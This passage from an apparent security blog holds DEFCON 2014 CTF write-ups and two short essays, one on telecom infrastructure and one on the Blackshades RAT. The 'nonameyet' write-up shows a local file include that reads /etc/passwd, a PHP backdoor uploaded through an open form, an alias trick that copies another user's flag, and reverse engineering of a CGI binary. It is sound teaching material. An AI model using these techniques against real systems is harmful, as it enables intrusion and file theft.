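        print "Enable password is: %s" % (known[:-1]+x)
        sys.exit()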

Running the script produces the output:

$ python shitsco.py
Enable password is: bruT3m3hard3rb4by

Excellent, let’s connect to the service with netcat and retrieve the flag:

$ nc shitsco_c8b1aa31679e945ee64bde1bdb19d035.2014.shallweplayaga.me 31337

 oooooooo8 oooo        o88    o8
888         888ooooo   oooo o888oo  oooooooo8    ooooooo     ooooooo
 888oooooo  888   888   888  888   888ooooooo  888     888 888     888
       888 888   888   888  888           888 888         888     888
o88oooo888 o888o o888o o888o  888o 88oooooo88    88ooo888    88ooo88

Welcome to Shitsco Internet Operating System (IOS)
For a command list, enter ?
$ enable bruT3m3hard3rb4by
Authentication Successful
# flag
The flag is: 14424ff8673ad039b32cfd756989be12

All that’s left to do is submit the flag and score points!

I’ll be posting another challenge and solution from the CTF soon, so if you found this one interesting, be sure to check back for more.

↧

Telecom as Critical Infrastructure: Looking Beyond the Cyber Threat

May 22, 2014, 11:30 am

Much of the discussion around cyber security of critical infrastructure focuses on the debilitating impact of a cyber attack on a country’s energy, economic, and transportation backbone. But Russia’s recent actions suggest an elevation of telecommunications as the most critical of all infrastructures—and the one it deems most worthy of protecting, not only because of the risks it may face, but also because of its potential as a mechanism for advancing national interests.

In March 2014, cyber attacks between Russia and Ukraine began when unknown hackers attacked Russian central bank and foreign ministry websites, and Ukrainian government websites were hit by an onslaught of 42 attacks during the Crimean vote for secession. Amid this back-and-forth volley of cyber attacks, Russia has quickly and quietly invested almost $25 million to provide Internet and telecom infrastructure in Crimea by deploying a fiber-optic submarine telecom link between the mainland and its newest territory. Rather than focusing on switching water, transportation, or electricity to Russian infrastructure, it has prioritized the establishment of telecommunications networks, turning this critical infrastructure into a tactic in and of itself.

By owning the telecom connections into Crimea, Russia ensures security for its communications there and eliminates Ukrainian disruptions. Russia’s telecom investments suggest that in the 21st century, national priorities in times of conflict have been reorganized around the assurance of secure telecommunications even before the assurance of traditional critical infrastructure security.

The threats to critical infrastructure are real and significant, but this prioritization of telecommunications as a tool of international relations suggests that we should pay attention not only to the cyber security risks to critical infrastructure, but also to how countries are using this very infrastructure as a tactic during times of conflict.

↧

Blackshades: Why We Should Care About Old Malware

May 28, 2014, 11:30 am

“Blackshades is so 2012” is close to the response I received when I mentioned to a friend the recent FBI takedown of almost 100 Blackshades RAT dealers. This nonchalant, almost apathetic attitude towards older malware struck a nerve with me, since I’ve known network defenders and incident responders with the same sentiment. If the malware isn’t fresh, or if it’s perceived as old, they don’t want any part of it. While that attitude isn’t necessarily the norm, it does serve as a reminder that malware never truly dies–it just keeps on compromising. In fact, more than a half million computers in over 100 countries were reportedly recently infected by the Blackshades malware.

The FBI arrests are indicative of the omnipresence of malware even after it has been identified. In addition to the arrests, the FBI seized more than 1,900 domains used by Blackshades users to control their victims’ computers. Despite these seizures, countless systems from around the globe continue to attempt connections with their respective Blackshades Command and Control (CnC) domains. And there’s really no telling how many people have a copy of the RAT. Blackshades has been around for a while, and with a sales price of $40, it’s also quite affordable–not to mention the fact that the source code was leaked in 2010. It seems likely that there are a number of Blackshades RAT controllers still at large.

What does Blackshades actually do? Just about anything the controller wants. Lately, the news around Blackshades has focused on its use as “Creepware,” in which a victim’s webcam is turned on remotely. But the RAT can do much more than that. For example, a couple of years ago the Blackshades Stealth version advertised the following capabilities:

General Computer Information (local IP, username, operating system (OS), uptime, webcam, etc.)
Screen, Webcam, and Voice Capture
Keylogger, File Manager, Processes, Password Recovery, Ping
Download and Execute, Shell, Maintenance (reconnect, close, restart, uninstall)
Open Windows (shows what applications are open)
Mac Compatible Client

There were other versions, too. The Blackshades Radar, for example, advertised the ability to set keywords to listen for in either the window title or written text. This would then trigger a key-logger to start logging keystrokes for a controller-specified amount of time, and the data collected would be sent back to the controller via email. This capability helped attackers pinpoint and exfiltrate a desired set of data, without a lot of excess key-logged chaff. Blackshades Recover advertised the ability to collect passwords, CD keys, and product keys for hundreds of popular software applications. And Blackshades Fusion advertised its ability to incorporate many of the previously described functions.

With such an impressive resume of capabilities, it’s no wonder the Syrian government used Blackshades, along with RAT-siblings Dark Comet and Gh0stRAT, against Syrian activists in early 2012. And even though that campaign may also be “so 2012” to some, the well-reported CnC domain used (alosh66(dot)servecounterstrike(dot)com) is still very much alive and kicking. In fact, according to various sources, there have been over 21,000 connection attempts for the domain this year from several countries around the globe, including from the U.S., with the majority coming from a Syrian Internet Service Provider. If this number for alosh66(dot)servecounterstrike(dot)com is accurate, and if that number holds true for the 1,900 domains seized by the FBI, that would equate to potentially 39,879,000 connection attempts to Blackshades CnC domains since January 1, 2014. Fortunately, the domain has essentially been terminated, as it has been resolving to 0.0.0.0 since 2012, but it’s possible that the controller could have reconfigured those systems to communicate via a different CnC domain, meaning all of the aforementioned systems could be actively infected.

While the exact number of infected systems cannot be determined, the recent arrests illustrate the longevity of malware. The cybercrime landscape not only includes new and emerging threats, but also requires constant assessment of older malware. Regardless of how many systems are infected by the Blackshades RAT, the FBI arrests truly highlight the fact that the war on cybercrime is in full swing.

↧

DEFCON Capture the Flag Qualification Challenge #2

June 3, 2014, 11:30 am

This is my second post in a series on DEFCON 22 CTF Qualifications. Last time I examined a problem called shitsco and gave a short overview of CTF. This week, I’d like to walk you through another DEFCON Qualification problem: “nonameyet” from HJ. This problem was worth 3 points and was opened late in the game. It was solved by 10 teams but, sadly, my team, Samurai, was not one of them. I managed to land this one about an hour after the game ended. It’s a common theme among CTF players that they don’t stop after the game ends. There’s always some measure of personal pride on the line when it comes to solving these problems, regardless of points earned.

The problem description for nonameyet is:

I claim no responsibility for the things posted here. nonameyet_27d88d682935932a8b3618ad3c2772ac.2014.shallweplayaga.me:80

There is no download link provided and the service is running on port 80. We are to assume that this is a web challenge. Browsing to the web application, I see that it allows users to upload photos to a /photos directory, hence the disclaimer in the problem description. Whenever a file upload capability is involved in a CTF web challenge, you can bet that it will be a source of a vulnerability. I have yet to see a web application problem in a CTF that provided a counterexample.

One of the URLs for the web application looked like this:

http://nonameyet_27d88d682935932a8b3618ad3c2772ac.2014.shallweplayaga.me/index.php?page=xxxxxxx

When I see page=xxxxxxx referencing a filename there is potential for a local file include vulnerability. Indeed, if I visit:

http://nonameyet_27d88d682935932a8b3618ad3c2772ac.2014.shallweplayaga.me/index.php?page=/etc/passwd

I am able to view the shadowed password file on the server. So far, so good. Unfortunately, asking for the flag file directly yields an error. Of course, a 3 point problem would never be so easy in this CTF. Let’s turn our attention back to the file upload.
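I never saw the source of index.php, so the following is only an illustration of the general pattern behind a local file include, written in Python rather than PHP. The web root /var/www and the function names unsafe_resolve and safe_resolve are assumptions made up for the example.

```python
import posixpath


def unsafe_resolve(web_root: str, page: str) -> str:
    """Join the request parameter onto the web root with no validation."""
    return posixpath.join(web_root, page)


def safe_resolve(web_root: str, page: str) -> str:
    """Reject any page that normalizes to a path outside the web root."""
    root = posixpath.normpath(web_root)
    candidate = posixpath.normpath(posixpath.join(root, page))
    if candidate != root and not candidate.startswith(root + "/"):
        raise ValueError("page escapes the web root: %r" % page)
    return candidate


# An absolute path simply replaces the web root in the unsafe version.
print(unsafe_resolve("/var/www", "/etc/passwd"))
print(safe_resolve("/var/www", "upfile.html"))
```

The safe variant only normalizes the path lexically. A real application would also want to account for symlinks and, better still, map page names to a fixed list of files.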

The page with the HTML for the upload form is upfile.html. This is loaded with a “?page=upfile.html” on the end of the URL. Examining the HTML source code on this file shows that our form data is submitted to /cgi-bin/nonameyet.cgi. We can recover this CGI program with a simple wget command:

 $ wget http://nonameyet_27d88d682935932a8b3618ad3c2772ac.2014.shallweplayaga.me/index.php\?page\=cgi-bin/nonameyet.cgi

$ file nonameyet.cgi

nonameyet.cgi: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped

You can find a copy of nonameyet.cgi here.

More interestingly, it is also possible to use the upload form to upload anything at all. This just begs to have a PHP backdoor uploaded to the system. We put a simple PHP file manager on nonameyet_27d88d682935932a8b3618ad3c2772ac.2014.shallweplayaga.me...and used that to look around the directory structure and permissions placed on the files. Specifically, we could see that the /home/nonameyet/flag file was owned by nonameyet:nonameyet. I need to gain execution as this user to retrieve the flag. The web server executing the PHP scripts (including our backdoor) was running as the web server user.

It is important to note that getting a shell on a box provides an opportunity for many new attack vectors. For this problem, it was actually solved by other teams editing the file /home/nonameyet/.bash_aliases to include an alias that would copy the /home/nonameyet/flag file to /tmp with world readable permissions. The next time anyone popped a shell on this box and ran “ls” they would hand the flag over to another team. This was a very clever and devious thing to do—and in some sense, this is what CTF is all about.

I believe that having this file editable was an oversight on the part of the organizers. This file should not have been writeable. It was a great advantage for the teams that realized this mistake because they were free to look at other problems while waiting for someone else to come along and solve it the “legitimate” way. Furthermore, anyone that thought to look in /tmp before the flag was cleaned up could score points too. Lesson learned: Always poke around more and possibly set up some sort of monitoring for these kinds of issues. I wish I had thought of this first!

Binary Analysis

I went straight for the binary in the problem. The binary was not marked SUID so there must be some webserver magic launching the CGI program as the nonameyet user. Indeed, HJ confirmed that he was using a modified version of suexec after the game. I have already run a file command to see that the CGI program is an ELF 32-bit program. My usual next step is to run strings.

$ strings nonameyet.cgi
…

I see imports for C functions related to string parsing and file operations including dangerous APIs like strcpy() and sprintf(). I see a list of the errors the CGI program will return and input variables like photo, time, and date. There are some chunks of HTML and HTTP headers too. So far, it is a fairly typical CGI program. If you try to run it you will get an error 900 printed out to you with HTML tags. A quick strace shows that it is looking for the photos directory. Create this directory and you will move on to the program prompting you for input. Just enter ^D to signal an end of file and you will receive an error 902. Back to the strings. One string that really caught my eye was the “cgilib” string. This is indicative of a cgilib library. There were other strings that pointed to a library as well, such as the “/tmp/cgilibXXXXXX” string.
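If the strings utility is not at hand, a rough equivalent is a few lines of Python. This is a minimal sketch: ascii_strings is a hypothetical helper, it only handles plain ASCII runs, and the sample bytes are invented for the demonstration rather than taken from nonameyet.cgi.

```python
import re


def ascii_strings(data: bytes, min_len: int = 4):
    """Yield runs of at least min_len printable ASCII bytes, roughly like strings."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    for match in pattern.finditer(data):
        yield match.group().decode("ascii")


# Invented sample data; with a real file use open(path, "rb").read().
blob = b"\x00\x01/tmp/cgilibXXXXXX\x00\x7fELF\x02cgilib\x00ab\x00"
for text in ascii_strings(blob):
    print(text)
```

Runs shorter than the minimum length, such as the three-letter ELF magic here, are skipped, which is the same default cut-off of four characters that strings uses.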

Cgilib is a “library [that] provides a simple and lightweight interface to the Common Gateway Interface (CGI) for C and C++ programs. Its purpose is to provide an easy to use interface to CGI for fast CGI programs written in the C or C++ programming language.” It is also an open source project. We can see from the output of the file command that the nonameyet.cgi program is dynamically linked, so let’s take a quick peek with ldd to see if cgilib is statically compiled into the binary or dynamically loaded at runtime from our system library.

$ ldd nonameyet.cgi
    linux-gate.so.1 =>  (0xb77dd000)
    libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb761e000)
    /lib/ld-linux.so.2 (0xb77de000)

We do not see cgilib in the list returned from ldd, so if the cgilib library is used in this program, it must have been statically linked, that is, compiled into the binary. That means I could have source code for a good chunk of this problem, which would be a great aid in the reverse engineering process. One way to match statically linked library code in CTF binaries is to use the IDA Pro FLAIR tools to generate a FLIRT signature that can be applied to the binary.

Which version of the library should I grab? The reverse lookup on the IP address used for this problem pointed to an Amazon EC2 server. I created an EC2 instance running the latest version of Ubuntu and applied all updates. It is important to mirror the game box as closely as possible. It is even better if we can run from the same ISP. I installed cgilib with this command:

$ sudo apt-get install cgilib

This added the file /usr/lib/libcgi.a. I pulled this file back to my analysis machine with FLAIR installed and ran:

C:\> pelf -a libcgi.a
C:\> sigmake -n "libcgi" libcgi.pat libcgi.sig

The first command “pelf” will parse the library file and generate patterns for all exported symbols. The output of the command is put into the libcgi.pat file. The next “sigmake” command will read from the libcgi.pat file and create a binary representation that is output in the libcgi.sig file. This sig file can then be copied into the IDA Pro /sig directory and applied to a live database. All of this completely failed. No symbols were applied. I have not identified why. Bummer.

Thankfully, the library is very simple and almost all of the functions contain unique strings. We can download the source code for libcgi, find a function we are interested in, find a string used in that function, then find the same string in IDA Pro. Once we find the string in IDA we can press ‘x’ while the cursor is positioned on that string to find cross-references. If we follow the (hopefully) single cross-reference that exists, we can then name the function referencing that string as it is named in the source code for cgilib. It is a bit slower than FLIRT signatures but we will be able to flag a significant portion of the program as “uninteresting” right away. For example, if we look at the cgiReadFile function in the cgilib source code cgilib-0.7/cgi.c:

char *cgiReadFile (FILE *stream, char *boundary)
{
    char *crlfboundary, *buf;
    size_t boundarylen;
    int c;
    unsigned int pivot;
    char *cp;
    char template[]= "/tmp/cgilibXXXXXX";
    FILE *tmpfile;
    int fd;

We can then find the /tmp/cgilibXXXXXX string in IDA Pro with a “search sequence of bytes”.

[Image: IDA Pro “search sequence of bytes” search for /tmp/cgilibXXXXXX]

This will fail! As it turns out, there is a compiler optimization used on this function causing the string to be loaded as an immediate value on the stack. This is also sometimes used in programs that want to make string analysis more difficult on the reverse engineer. Indeed, if we go back and look at the string output our first clue is there:

~$ strings nonameyet.cgi
…
/tmp
/cgi
libX
XXXXf
…

They are broken up into groups of 4. This is because they are referenced as immediate DWORD values being moved into memory. Let’s repeat the search using a smaller string. If we search for “/tmp” we see exactly one spot in the binary where this appears. Here is how IDA shows the string data being loaded onto the stack:

[Image: IDA Pro disassembly loading the string onto the stack as immediate DWORD values]
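To see why the string shows up in four-byte pieces, here is a short Python sketch that splits it the way a compiler might when it stores a string through immediate operands. The helper name as_stack_immediates is made up, and padding the final short chunk to four bytes is my simplification; the real code may well use a smaller store for the tail.

```python
import struct


def as_stack_immediates(text: bytes):
    """Split a NUL-terminated string into little-endian 32-bit immediates."""
    data = text + b"\x00"
    out = []
    for i in range(0, len(data), 4):
        chunk = data[i:i + 4]
        padded = chunk.ljust(4, b"\x00")    # simplification for the short tail
        out.append((chunk, struct.unpack("<I", padded)[0]))
    return out


for chunk, value in as_stack_immediates(b"/tmp/cgilibXXXXXX"):
    print("%-12r 0x%08x" % (chunk, value))
```

Because x86 is little-endian, each immediate reads backwards in the instruction operand but lands in memory in the original order, which is why strings still finds “/tmp”, “/cgi” and “libX” as separate four-character hits.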

We can now go to the top of this function and name it (‘n’ key) “cgiReadFile.” If you go through the rest of cgi.c you will end up with the following functions named:

[Image: IDA Pro function list showing the named cgilib functions]

The function named cgi_print (my name, not the cgilib name) is frequently called to output error messages that would be useful for debugging purposes. A quick look at this function reveals that if we set dword_804f0dc (normally 0 in the .bss) to something greater than arg0 (I assume this is a logging level?) we can get debugging output from the binary. In gdb this can be done by writing a suitably large value to that address after the program has started. With the library functions named, here is the decompiled main():

int __usercall main@<eax>(char *a1@<esi>)
{
  int result; // eax@2
  void *v2; // eax@15
  int v3; // [sp+1Ch] [bp-4Ch]@1
  int v4; // [sp+20h] [bp-48h]@9
  int v5; // [sp+24h] [bp-44h]@5
  int v6; // [sp+28h] [bp-40h]@9
  int v7; // [sp+2Ch] [bp-3Ch]@5
  int v8; // [sp+30h] [bp-38h]@9
  int v9; // [sp+34h] [bp-34h]@5
  int v10; // [sp+38h] [bp-30h]@9
  int v11; // [sp+3Ch] [bp-2Ch]@5
  int v12; // [sp+40h] [bp-28h]@9
  int v13; // [sp+44h] [bp-24h]@5
  int v14; // [sp+48h] [bp-20h]@9
  size_t file_size; // [sp+4Ch] [bp-1Ch]@1
  const void *v16; // [sp+50h] [bp-18h]@1
  void *s_cgi; // [sp+54h] [bp-14h]@1
  int photo; // [sp+58h] [bp-10h]@1
  int v19; // [sp+5Ch] [bp-Ch]@1

  v16 = 0;
  file_size = 0;
  s_cgi = 0;
  photo = 0;
  v19 = 0;
  memset(&v3, 0, 0x30u);
  s_cgi = cgiInit();
  v19 = open("./photos", 0);
  if ( v19 == -1 )
  {
    write_headers();
    printf("<p>ERROR: 900</p>");
    result = 0;
  }
  else if ( fchdir(v19) == -1 )
  {
    write_headers();
    printf("<p>ERROR: 901</p>");
    close(v19);
    result = 0;
  }
  else
  {
    close(v19);
    photo = cgiGetFile((int)s_cgi, "photo");
    v3 = cgiGetValue((int)s_cgi, "base");
    v7 = cgiGetValue((int)s_cgi, "time");
    v9 = cgiGetValue((int)s_cgi, "date");
    v11 = cgiGetValue((int)s_cgi, "pixy");
    v13 = cgiGetValue((int)s_cgi, "pixx");
    v5 = cgiGetValue((int)s_cgi, "genr");
    if ( photo )
    {
      if ( !v3 )
        v3 = *(_DWORD *)(photo + 8);
      v4 = urldecode(v3);
      v8 = urldecode(v7);
      v6 = urldecode(v5);
      v10 = urldecode(v9);
      v12 = urldecode(v11);
      v14 = urldecode(v13);
      v16 = read_file(*(char **)(photo + 12), (int)&file_size);
      if ( v16 )
      {
        if ( file_size )
        {
          if ( (interesting((int)&file_size, a1, (int)&v3) & 0x80000000) == 0 )
          {
            v2 = base64encode(v3, v4);
            combine_strings("Cookie", v2);
            write_headers();
            cgiFree(s_cgi);
            v19 = open((const char *)v3, 66, 420);
            if ( v19 == -1 )
            {
              printf("<p>ERROR: 906</p>", v3);
            }
            else
            {
              write(v19, v16, file_size);
              close(v19);
            }
            printf("<meta http-equiv='refresh' content='0;url=../thanks.php'>");
            result = 0;
          }
          else
          {
            write_headers();
            printf("<p>ERROR: 905</p>");
            result = 0;
          }
        }
        else
        {
          write_headers();
          printf("<p>ERROR: 904. Why the hell would you give me an empty file</p>");
          result = 0;
        }
      }
      else
      {
        write_headers();
        printf("<p>ERROR: 903</p>");
        result = 0;
      }
    }
    else
    {
      write_headers();
      printf("<p>ERROR: 902</p>");
      result = 0;
    }
  }
  return result;
}

When looking at a CTF problem, you should always be asking yourself “What is happening with my input?” Most of the parsing happens right up front in the cgiInit() function. This function will read and parse CGI input and set up the s_cgi structure. This function first checks for the environment variable CONTENT_TYPE. CGI input is usually passed via environment variables and stdin from the webserver. If this environment variable is not set then the program will read variables from stdin.

If the CONTENT_TYPE variable is set to “multipart/form-data” it will parse out a boundary condition from the variable and call off into the cgiReadMultipart() function before returning. If the CONTENT_TYPE variable is anything else, the program then looks for the REQUEST_METHOD and CONTENT_LENGTH environment variables.

For a REQUEST_METHOD of “GET” the environment variable QUERY_STRING is parsed and for a REQUEST_METHOD of “POST” stdin is parsed. If none of these are specified then the cgiReadVariables() function will prompt for input from the command line. This is very handy for quick testing. The cgiInit() function will also parse cookie information. All of this was learned by reading the cgilib source code for cgiInit().
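The decision tree described in the last few paragraphs can be summarized in a few lines of Python. This is my paraphrase of the flow, not cgilib's code: choose_input_path and its return labels are hypothetical, and cookie parsing is left out because it happens in addition to, rather than instead of, these paths.

```python
def choose_input_path(env: dict) -> str:
    """Return which input source a cgiInit()-style parser would use."""
    content_type = env.get("CONTENT_TYPE", "")
    if content_type.startswith("multipart/form-data"):
        return "multipart"          # boundary parsed, then cgiReadMultipart()
    method = env.get("REQUEST_METHOD")
    if method == "GET":
        return "query_string"       # variables come from QUERY_STRING
    if method == "POST":
        return "stdin_post"         # CONTENT_LENGTH bytes read from stdin
    return "interactive"            # offline mode: name=value pairs on stdin


print(choose_input_path({}))
print(choose_input_path({"CONTENT_TYPE": "multipart/form-data; boundary=xyz"}))
```

Laying it out this way makes it easy to see that running the binary with an empty environment lands in the interactive branch.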

We have five code paths for parsing our input: multipart, get, post, stdin, and cookies. All of these are standard in cgilib. Which code path should we explore first? Let’s start with the simplest form, no environment variables, and data parsed directly from stdin.

$ python -c "print 'asdf=asdf'" | ./nonameyet.cgi
	(offline mode: enter name=value pairs on standard input)
	Content-type: text/html<p>ERROR: 902</p>

Here we just set a variable asdf = asdf and we are returned error 902, the same as if we passed in no input. Looking back to main() we can easily spot where “ERROR: 902” is printed inside of an else block. Look up to the if condition on that else block and we see that this is because photo = cgiGetFile((int)s_cgi, “photo”); returned NULL. Setting the photo variable from stdin also produces the same error. The cgiGetFile() call did not find a variable called photo registered in the s_cgi structure. There is another interesting behavior here if we set the same variable twice:

$ python -c "print 'asdf=asdf\nasdf=asdf'" | ./nonameyet.cgi
	(offline mode: enter name=value pairs on standard input)
	Segmentation fault (core dumped)

Crashes are usually really good in a CTF competition. Going into this with a debugger we find:

$ gdb ./nonameyet.cgi
Reading symbols from ./nonameyet.cgi...(no debugging symbols found)...done.
gdb-peda$ r
Starting program: /home/bool/nonameyet.cgi
(offline mode: enter name=value pairs on standard input)
asdf=asdf
asdf=asdf

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x4
ECX: 0xb7fcf448 --> 0x8050080 --> 0x66 ('f')
EDX: 0x8050078 ("asdf\nasdf")
ESI: 0x0
EDI: 0x805008d --> 0x0
EBP: 0xbffff668 --> 0xbffff698 --> 0xbffff708 --> 0x0
ESP: 0xbffff590 --> 0x0
EIP: 0x804bb5d (mov    edx,DWORD PTR [eax+0x4])
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x804bb52:   shl    eax,0x2
   0x804bb55:   add    eax,DWORD PTR [ebp-0x84]
   0x804bb5b:   mov    eax,DWORD PTR [eax]
=> 0x804bb5d:   mov    edx,DWORD PTR [eax+0x4]
   0x804bb60:   mov    eax,DWORD PTR [ebp-0x98]
   0x804bb66:   shl    eax,0x2
   0x804bb69:   add    eax,DWORD PTR [ebp-0x84]
   0x804bb6f:   mov    eax,DWORD PTR [eax]
[------------------------------------stack-------------------------------------]
0000| 0xbffff590 --> 0x0
0004| 0xbffff594 --> 0x804d483 ("%s\n%s")
0008| 0xbffff598 --> 0x8050058 --> 0x0
0012| 0xbffff59c --> 0x8050088 --> 0x8050050 --> 0x0
0016| 0xbffff5a0 --> 0xb7fff55c --> 0xb7fde000 --> 0x464c457f
0020| 0xbffff5a4 --> 0x3
0024| 0xbffff5a8 --> 0x0
0028| 0xbffff5ac --> 0xffffffff
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0804bb5d in ?? ()
gdb-peda$

I should mention that I am using PEDA with GDB. It makes exploit development tasks a lot easier than standard GDB. I encourage you to check it out and explore how it works. Anyway, this is a NULL pointer dereference crash. The register EAX is being dereferenced. EAX is NULL. As a result, the program sends a signal 11 or SIGSEGV and we terminate execution. The buggy code seems to be in cgilib/cgi.c on line 644 when they attempt to do:

644:	cgiDebugOutput (1, "%s: %s", result[i]->name, result[i]->value);

It looks to me like they used the incorrect index into the result array. There is another index counter called k, used earlier in the code, that accounts for duplicate variable names. My guess is that this line was simply copied and pasted from line 630 and the developers did not change ‘i’ to ‘k’. Either way, I am not sure if a web server would ever generate input to a CGI program like this, and unless we can somehow allocate the NULL address space on the remote server, this is not likely to be a useful crash when solving the CTF problem. Interesting, but ultimately useless.

Back to our problem. The photo variable is NULL. Looking back in cgi.c source code for cgiGetFile() it is easy to spot that this information comes from s_cgi->files. Ok, that makes sense. However, the only code path that sets this information is when we have a CONTENT_TYPE of “multipart/form-data”. This was discovered with a quick grep for “->files” in the cgilib source code to find something that writes to this variable. The one place this happens is in the cgiReadMultipart() function. Let’s jump into feeding this program multipart data.

I used Wireshark to perform a packet capture on the data that was being sent by my browser when submitting a form to nonameyet.cgi. After all, the browser should already generate everything we need. With a quick copy and paste and setting up lines to end with \r\n instead of \n I now have the following setup to get multipart data parsed by the CGI program:

$ export CONTENT_TYPE="Content-Type: multipart/form-data; boundary=---------------------------13141138687192"

$ cat formdata
-----------------------------13141138687192
Content-Disposition: form-data; name="photo"; filename="test"
Content-Type: application/octet-stream

test

-----------------------------13141138687192--
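
For anyone who would rather generate this file than fix up line endings by hand, here is a minimal Python 3 sketch. The function name build_formdata is my own, and the sketch only covers the single "photo" part shown above; it is not how the original file was produced (that was a copy and paste from Wireshark).

```python
# Sketch: build the multipart body shown above with CRLF line endings.
# The boundary is the value from CONTENT_TYPE: 27 dashes plus the digits.
BOUNDARY = "-" * 27 + "13141138687192"


def build_formdata(filename: str, contents: bytes) -> bytes:
    """Return a one-part multipart/form-data body for the "photo" field."""
    delimiter = b"--" + BOUNDARY.encode("ascii")  # 29 dashes on the wire
    lines = [
        delimiter,
        b'Content-Disposition: form-data; name="photo"; filename="'
        + filename.encode("ascii") + b'"',
        b"Content-Type: application/octet-stream",
        b"",
        contents,
        b"",
        delimiter + b"--",  # closing delimiter
    ]
    # Every line, including the last one, ends with \r\n.
    return b"\r\n".join(lines) + b"\r\n"
```

Writing the result of build_formdata("test", b"test") to a file opened in "wb" mode should give a body equivalent to the one above.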

Remember each line ends with \r\n. After I set up the formdata file and my environment variable, let’s see if we can get past that error 902 output. I will also turn on the debug output with the debugger after breaking on main():

$ gdb ./nonameyet.cgi
Reading symbols from ./nonameyet.cgi...(no debugging symbols found)...done.
gdb-peda$ break *0x0804906D
Breakpoint 1 at 0x804906d
gdb-peda$ set args < formdata
gdb-peda$ r
Starting program: /home/bool/nonameyet.cgi < formdata
Breakpoint 1, 0x0804906d in ?? ()
gdb-peda$ set {int}0x804F0DC=1000
gdb-peda$ c
Continuing.
Content-Type: Content-Type: multipart/form-data; boundary=---------------------------13141138687192
Read line '-----------------------------13141138687192'
Read line 'Content-Disposition: form-data; name="photo"; filename="test"'
Found field name photo
Found filename test
Read line 'Content-Type: application/octet-stream'
Found mime type application/octet-stream
Read line ''
Wrote photo (test) to file: /tmp/cgilibWFDOKJ
Read line '-----------------------------13141138687192'
photo found as test
Content-type: text/html
Cookie: YmFzZQA=<meta http-equiv='refresh' content='0;url=../thanks.php'>[Inferior 1 (process 7579) exited normally]

That looks pretty good! In truth, it took a bit of playing around to get to this point. Now we have everything specified in our form being read. The file contents were written and parsed and if we look in the /photos directory we see a file named base with the contents test:

$ ls photos/
base
$ cat photos/base
test

Where is the bug? If you look back up in the main() function you will see a subroutine I labeled “interesting”. The only way to get to this function is to have a valid photo returned from cgiGetFile(). Here is the decompiled source code for the interesting function:

unsigned int __usercall interesting@<eax>(int edi0@<edi>, char *a2@<esi>, int a1)
{
  unsigned int result; // eax@1
  void *v4; // esp@2
  char v5; // bl@3
  int v6; // edx@3
  int v7; // ecx@3
  void *v8; // esp@4
  int v9; // ecx@7
  unsigned int v10; // ecx@8
  void *v11; // edi@9
  unsigned int v12; // ecx@11
  void *v13; // edi@12
  unsigned int v14; // ecx@14
  void *v15; // edi@15
  unsigned int v16; // ecx@17
  void *v17; // edi@18
  unsigned int v18; // ecx@20
  void *v19; // edi@21
  int v20; // eax@25
  int v21; // [sp+0h] [bp-20h]@2
  unsigned int counter_1; // [sp+8h] [bp-18h]@1
  const void *esp_ptr; // [sp+Ch] [bp-14h]@2
  int file_name_size; // [sp+10h] [bp-10h]@2
  int filename; // [sp+14h] [bp-Ch]@2
  int type_mult_2; // [sp+18h] [bp-8h]@2
  int counter; // [sp+1Ch] [bp-4h]@1

  result = 0;
  counter = 0;
  counter_1 = 0;
  if ( a1 )
  {
    file_name_size = *(_DWORD *)(a1 + 4);
    type_mult_2 = 2 * file_name_size;
    v4 = alloca(2 * file_name_size);
    esp_ptr = &v21;
    filename = *(_DWORD *)a1;
    while ( 1 )
    {
      while ( 1 )
      {
        v5 = *(_BYTE *)(counter + filename);
        v6 = counter++ + filename + 1;
        v7 = type_mult_2;
        if ( type_mult_2 <= (signed int)counter_1 )
        {
          v8 = alloca(type_mult_2);
          qmemcpy(&v21, &v21, type_mult_2);
          a2 = (char *)&v21 + v7;
          edi0 = (int)((char *)&v21 + v7);
          esp_ptr = &v21;
          type_mult_2 *= 2;
        }
        if ( v5 != '%' || *(_BYTE *)(v6 + 4) != '%' )
        {
          *((_BYTE *)esp_ptr + counter_1++) = v5;
          goto LABEL_24;
        }
        v9 = *(_DWORD *)v6;
        v6 += 5;
        counter += 5;
        if ( v9 != 'rneG' )
          break;
        v10 = *(_DWORD *)(a1 + 12);
        a2 = *(char **)(a1 + 8);
        if ( a2 )
        {
          v11 = (char *)esp_ptr + counter_1;
          counter_1 += v10;
          qmemcpy(v11, a2, v10);
          a2 += v10;
          edi0 = (int)((char *)v11 + v10);
LABEL_24:
          if ( file_name_size <= counter )
          {
            v20 = mmap(v6, edi0, (int)a2);
            qmemcpy((void *)v20, esp_ptr, counter_1);
            *(_DWORD *)a1 = v20;
            result = counter_1;
            *(_DWORD *)(a1 + 4) = counter_1;
            return result;
          }
        }
      }
      switch ( v9 )
      {
        case 'emiT':
          v12 = *(_DWORD *)(a1 + 20);
          a2 = *(char **)(a1 + 16);
          if ( a2 )
          {
            v13 = (char *)esp_ptr + counter_1;
            counter_1 += v12;
            qmemcpy(v13, a2, v12);
            a2 += v12;
            edi0 = (int)((char *)v13 + v12);
            goto LABEL_24;
          }
          break;
        case 'etaD':
          v14 = *(_DWORD *)(a1 + 28);
          a2 = *(char **)(a1 + 24);
          if ( a2 )
          {
            v15 = (char *)esp_ptr + counter_1;
            counter_1 += v14;
            qmemcpy(v15, a2, v14);
            a2 += v14;
            edi0 = (int)((char *)v15 + v14);
            goto LABEL_24;
          }
          break;
        case 'YxiP':
          v16 = *(_DWORD *)(a1 + 36);
          a2 = *(char **)(a1 + 32);
          if ( a2 )
          {
            v17 = (char *)esp_ptr + counter_1;
            counter_1 += v16;
            qmemcpy(v17, a2, v16);
            a2 += v16;
            edi0 = (int)((char *)v17 + v16);
            goto LABEL_24;
          }
          break;
        case 'XxiP':
          v18 = *(_DWORD *)(a1 + 44);
          a2 = *(char **)(a1 + 40);
          if ( a2 )
          {
            v19 = (char *)esp_ptr + counter_1;
            counter_1 += v18;
            qmemcpy(v19, a2, v18);
            a2 += v18;
            edi0 = (int)((char *)v19 + v18);
            goto LABEL_24;
          }
          break;
      }
    }
  }
  return result;
}

